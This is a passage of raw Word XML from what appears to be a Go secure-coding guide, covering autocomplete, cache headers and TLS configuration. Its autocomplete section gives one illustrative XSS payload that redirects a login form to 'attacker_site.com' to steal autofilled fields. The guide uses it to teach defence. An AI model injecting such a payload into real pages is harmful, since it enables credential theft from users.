      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">{}, encrypted[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">:], &amp;decryptNonce, &amp;secretKey)
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> !ok {
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"decryption error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(decrypted))
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The output will be:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hello world
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="59" w:name="Disable_what_you_don_t_need"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Disable what you don't need</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Another simple and efficient way to mitigate attack vectors is to guarantee that any unnecessary applications or services are disabled in your systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="60" w:name="Autocomplete"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>Autocomplete</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">According to </w:t>
      </w:r>
      <w:hyperlink r:id="rId67" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Mozilla documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, you can disable autocompletion in the entire form by using:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 17"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">form</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">method</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"post"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">action</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/form"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">autocomplete</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"off"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Or a specific form element:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 17"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;</w:t>
        <w:t xml:space="preserve">input</w:t>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">type</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"text"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">id</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"cc"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">name</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"cc"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
        <w:t xml:space="preserve">autocomplete</w:t>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"off"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>This is especially useful for disabling autocomplete on login forms. Imagine a case where a XSS vector is present in the login page. If the malicious user creates a payload like:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">window</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.setTimeout(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text9"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{
  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.forms[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">].action = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">'http://attacker_site.com'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;
  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">document</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.forms[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">].submit();
}
), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">10000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">);
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It will send the autocomplete form fields to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>attacker_site.com</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="61" w:name="Cache"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 3"/>
      </w:pPr>
      <w:r>
        <w:t>Cache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">w.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Cache-Control"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"no-cache, no-store"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
w.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Pragma"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"no-cache"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>no-cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value tells the browser to revalidate with the server before using any cached response. It does not tell the browser to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>not cache</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the other hand, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>no-store</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value is really about disabling caching overall, and must not store any part of the request or response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Pragma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header is there to support HTTP/1.0 requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="62" w:name="Communication_Security"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Communication Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>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18"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/TLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Websockets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="63" w:name="HTTP_TLS"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP/TLS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>TLS/SSL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a cryptographic protocol that allows encryption over otherwise unsecure communication channels. The most common usage of TLS/SSL is to provide secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> communication, also known as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t>. The protocol ensures that the following properties apply to the communication channel:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Privacy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Data integrity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Its implementation in Go is in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Cryptography Practices</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section of this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The following is a simple example of HTTP with TLS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"log"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"net/http"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
  http.HandleFunc(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> (w http.ResponseWriter, req *http.Request) {
    w.Write([]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"This is an example server.\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
  })
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// yourCert.pem - path to your server certificate in PEM format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// yourKey.pem -  path to your server private key in PEM format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  log.Fatal(http.ListenAndServeTLS(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":443"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"yourCert.pem"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"yourKey.pem"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
}
</w:t>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">w.Header().Add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Strict-Transport-Security"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"max-age=63072000; includeSubDomains"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go's TLS implementation is in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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5"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">...
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> Certificates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    CertFile    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    KeyFile     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    httpsServer := &amp;http.Server{
        Addr: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8080"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">,
    }
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> certs []Certificates
    certs = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(certs, Certificates{
        CertFile: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"../etc/yourSite.pem"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//Your site certificate key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
        KeyFile:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"../etc/yourSite.key"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">//Your site private key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
    })
    config := &amp;tls.Config{}
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err error
    config.Certificates = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">([]tls.Certificate, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(certs))
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i, v := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">range</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> certs {
        config.Certificates[i], err = tls.LoadX509KeyPair(v.CertFile, v.KeyFile)
    }
    conn, err := net.Listen(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"tcp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8080"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    tlsListener := tls.NewListener(conn, config)
    httpsServer.Serve(tlsListener)
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Listening on port 8080..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
}
</w:t>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30" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>OWASP SCP Quick Reference Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Important:</w:t>
        <w:t xml:space="preserve"> Invalid TLS certificates should always be rejected. Make sure that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>InsecureSkipVerify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> configuration is not set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in a production environment.</w:t>
        <w:br w:clear="none"/>
        <w:t>The following snippet is an example of how to set this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">config := &amp;tls.Config{InsecureSkipVerify: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Use the correct hostname in order to set the server name:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
